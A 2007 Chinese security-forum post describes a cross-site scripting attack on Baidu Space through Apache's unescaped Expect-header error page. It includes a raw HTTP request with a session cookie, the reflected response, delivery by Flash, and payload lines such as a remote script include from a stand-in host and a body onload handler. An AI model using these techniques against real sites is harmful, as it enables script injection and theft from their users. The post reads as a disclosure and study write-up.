查看: 1710|回复: 2
收起左侧

[求助] 百度空间跨站攻击一例

[复制链接]
yxwxqflbyg
发表于 2007-11-9 04:34:32 | 显示全部楼层 |阅读模式
注:文章首发http://s0n9.blog.sohu.com/,后由原创作者友情提交到邪恶八进制信息安全团队。

1.首先这是个Apache的老漏洞,Apache在接收Expect这个HTTP报头会直接输出报头的错误信息,错误信息的内容并没有被转义。

实际过程是这样的,我们发出一个HTTP请求,给加上报头Expect: <xss>,这个报头的内容Expect: <xss>将会被当成错误信息输出。

那么针对百度测试一下

发起一个POST请求,
POST / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Referer: http://xss.betaslife.com/baidu.swf
Content-Type: application/x-www-form-urlencoded
Expect: <xss> Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: hi.baidu.com
Content-Length: 7
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: BAIDUID=875AE724A06D77C70D79C96D1CEB6C81

xss

结果返回了如下内容
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>417 Expectation Failed</TITLE></HEAD><BODY><H1>Expectation Failed</H1>The expectation given in the Expect request-header field could not be met by this server.<P>The client sent<PRE> Expect: <xss> Accept-Encoding: gzip, deflate</PRE>but we only allow the 100-continue expectation.</BODY></HTML>

根据测试的结果发现百度空间的所有服务器都存在这个漏洞,当然现在很多大网站也存在这样的问题。

2.再来看看这个漏洞,这个漏洞的跨站脚本是在主域名下实现的,也就是我们可以在hi.baidu.com下写任意的脚本内容.

大家都知道现在百度空间的富文本编辑做得比较安全,基本上没有什么跨站脚本漏洞,上面测试出了漏洞,那么利用这个Apache漏洞我们就能做一些邪恶的事情,要找出能发出这个HTTP报头的方法,如果利用AJAX技术是会有域限制的,所以我们只能利用FLASH文件。

在实际测试过程中遇到了一些问题,Expect头输出的内容是延时的,很多如DOCUMENT.WRITE和NEW IMGE()的方法也都会失效,直接

Expect: <script src=http://xxx.com/xx.js></script>远程链接一个脚本也不会被执行,所以我们只能用<body onload=xxx>类似的方法在网页加载时就运行脚本。

然后最主要的是浏览器的编码问题,当发起这个请求后返回的页面大部分是UNICODE编码,也就是你想写入的JAVASCRIPT不能包含中文,这里LUOLUO哥教了我一个小技巧指定脚本标记中的编码 <script charset="" xxxx

突破了这两个问题就能直接实现我们的攻击。
dxhyshxd
发表于 2007-11-9 05:54:18 | 显示全部楼层
楼主来交流攻击啊!
9685996
发表于 2007-11-9 08:36:11 | 显示全部楼层
呵呵~~~

  学习一下
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-26 21:23 , Processed in 0.123519 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表